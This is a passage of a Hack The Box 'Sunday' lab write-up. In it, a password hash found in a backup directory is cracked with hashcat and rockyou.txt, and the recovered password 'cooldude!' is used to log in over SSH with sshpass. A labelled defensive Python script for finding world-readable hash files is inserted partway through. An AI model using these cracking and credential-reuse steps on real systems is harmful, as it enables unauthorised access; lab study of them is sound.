sammy


Readable system credential hashes were discovered in the /backup/ directory.

Password Cracking


┌──(kali㉿kali)-[~/archive/htb/labs/sunday]
└─$ hashcat -a 0 -m 7400 sammy.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:cooldude!
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 7400 (sha256crypt $5$, SHA256 (Unix))
Hash.Target......: $5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB
Time.Started.....: Sat Jan 21 16:50:37 2023 (2 mins, 58 secs)
Time.Estimated...: Sat Jan 21 16:53:35 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     1145 H/s (7.90ms) @ Accel:64 Loops:256 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 203712/14344385 (1.42%)
Rejected.........: 0/203712 (0.00%)
Restore.Point....: 203520/14344385 (1.42%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:4864-5000
Candidate.Engine.: Device Generator
Candidates.#1....: coolster -> circus1
Hardware.Mon.#1..: Util: 85%
 
Started: Sat Jan 21 16:50:22 2023
Stopped: Sat Jan 21 16:53:37 2023

Hashcat cracked the password hash for the sammy user. The cracked password is cooldude!
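The crack above was only possible because a copy of the credential hashes was readable under /backup/. The following is an added audit example, not part of the original notes: it walks a directory tree and reports shadow-style crypt(3) hashes stored in world-readable files. The function names and the sample data are assumptions constructed for illustration.

```python
import os
import re
import stat
import tempfile

# Shadow-style line: user:$id$[rounds=N$]salt$digest:...
# The ids below are the standard crypt(3) scheme prefixes.
SCHEMES = {"1": "md5crypt", "2a": "bcrypt", "2b": "bcrypt", "2y": "bcrypt",
           "5": "sha256crypt", "6": "sha512crypt", "y": "yescrypt"}
SHADOW_RE = re.compile(
    r"^(?P<user>[^:\s]+):\$(?P<id>[0-9a-z]{1,2})\$(?:rounds=(?P<rounds>\d+)\$)?[^:]+")


def find_exposed_hashes(root):
    """Return (path, user, scheme, rounds) for hashes in world-readable files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
                # Only regular files with the "other: read" bit set are reported.
                if not stat.S_ISREG(st.st_mode) or not st.st_mode & stat.S_IROTH:
                    continue
                with open(path, "r", errors="replace") as fh:
                    for line in fh:
                        m = SHADOW_RE.match(line)
                        if m and m["id"] in SCHEMES:
                            # None means no explicit rounds= field in the hash.
                            rounds = int(m["rounds"]) if m["rounds"] else None
                            findings.append((path, m["user"], SCHEMES[m["id"]], rounds))
            except OSError:
                continue  # unreadable or vanished file: skip it
    return findings


def demo():
    """Constructed sample: one world-readable and one owner-only backup copy."""
    sample = "alice:$5$CONSTRUCTEDSALT$" + "A" * 43 + ":6445::::::\nbob:NP:6445::::::\n"
    with tempfile.TemporaryDirectory() as d:
        for name, mode in (("shadow.backup", 0o644), ("shadow.safe", 0o600)):
            p = os.path.join(d, name)
            with open(p, "w") as fh:
                fh.write(sample)
            os.chmod(p, mode)
        return [(os.path.basename(p), u, s, r) for p, u, s, r in find_exposed_hashes(d)]


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

The check looks only at the file's own mode bits, so a world-readable file inside a directory that other users cannot traverse is still reported and should be reviewed by hand.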

SSH


┌──(kali㉿kali)-[~/archive/htb/labs/sunday]
└─$ sshpass -p 'cooldude!' ssh sammy@$IP -p 22022
warning: 10 failed authentication attempts since last successful authentication.  The latest at Sat Jan 21 14:58 2023.
last login: Wed Apr 13 15:38:02 2022 from 10.10.14.13
Oracle Corporation      SunOS 5.11      11.4    Aug 2018
-bash-4.4$ whoami
sammy
-bash-4.4$ hostname
sunday
-bash-4.4$ ifconfig -a
lo0: flags=2001000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv4,VIRTUAL> mtu 8232 index 1
        inet 127.0.0.1 netmask ff000000 
net0: flags=100001000843<UP,BROADCAST,RUNNING,MULTICAST,IPv4,PHYSRUNNING> mtu 1500 index 2
        inet 10.10.10.76 netmask fffffe00 broadcast 10.10.11.255
lo0: flags=2002000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv6,VIRTUAL> mtu 8252 index 1
        inet6 ::1/128 
net0: flags=120002000840<RUNNING,MULTICAST,IPv6,PHYSRUNNING> mtu 1500 index 2
        inet6 ::/0 

Lateral Movement to the sammy user via SSH